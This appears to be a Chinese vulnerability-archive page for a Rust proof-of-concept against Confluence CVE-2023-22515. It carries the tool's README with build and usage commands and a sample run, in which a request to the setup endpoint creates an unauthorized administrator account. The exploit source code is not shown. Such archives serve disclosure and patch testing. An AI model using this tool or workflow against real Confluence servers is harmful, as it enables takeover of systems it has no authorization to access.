漏洞平台

POC详情： 0ea5d13b490e65d1738207ff0efc59ea05d9258e

来源

https://github.com/killvxk/CVE-2023-22515-joaoviictorti

关联漏洞

标题： Atlassian Confluence Server 安全漏洞 (CVE-2023-22515)
描述：Atlassian Confluence Server是澳大利亚Atlassian公司的一套具有企业知识管理功能，并支持用于构建企业WiKi的协同软件的服务器版本。 Atlassian Confluence Server存在安全漏洞，该漏洞源于外部攻击者可能利用可公开访问的Confluence Data Center和Confluence Serve，用未知的漏洞来创建Confluence 管理员帐户并访问 Confluence 实例。

描述

CVE-2023-22515 (Confluence Broken Access Control Exploit)

介绍

# CVE-2023-22515

<p align="left">
	<a href="https://www.rust-lang.org/"><img src="https://img.shields.io/badge/made%20with-Rust-red"></a>
	<a href="#"><img src="https://img.shields.io/badge/platform-osx%2Flinux%2Fwindows-blueviolet"></a>
</p>

- [Overview](#overview)
- [Compile](#compile)
- [Usage](#usage)
- [Running CVE-2023-22515](#running-cve-2023-22515)

# Overview

Confluence is a web-based enterprise wiki developed by Australian software company Atlassian.
Atlassian has been made aware of an issue reported by some customers where external attackers may have exploited a previously unknown vulnerability in publicly accessible Confluence server and data center instances to create unauthorized Confluence administrator accounts and access Confluence instances.

The vulnerability has been classified as ```CVE-2023-22515```

# Compile

First perform the compilation with the command:

```sh
cargo build --release
```

# Usage

You can do it in these two ways:
```sh
cargo run -- --target http://localhost --username "teste" --password "teste" 
```

```sh
.\target\release\cve_2023_22515 --target http://localhost --username "teste" --password "teste" 
```

This will display help for the tool. Here are all the switches it supports:

```yaml
CVE-2023-22515

Usage: CVE_2023_22515 --target <TARGET> --username <USERNAME> --password <PASSWORD>

Options:
  -t, --target <TARGET>      Insert target
  -u, --username <USERNAME>  Insert username
  -p, --password <PASSWORD>  Insert password
  -h, --help                 Print help
```

# Running CVE-2023-22515

```console
cargo run -- --target http://example.com --username "teste" --password "teste" 

[!] Request for: http://example.com/setup/setupadministrator.action
[!] Creating Administrator account
[!] Checking the answer
[+] Username created successfully: teste
[+] Password created successfully: teste
[+] Exploit ending successfully!!
```

文件快照


 [4.0K]  /data/pocs/0ea5d13b490e65d1738207ff0efc59ea05d9258e
├── [ 32K]  Cargo.lock
├── [ 307]  Cargo.toml
├── [1.9K]  README.md
└── [4.0K]  src
    └── [3.3K]  main.rs

1 directory, 4 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。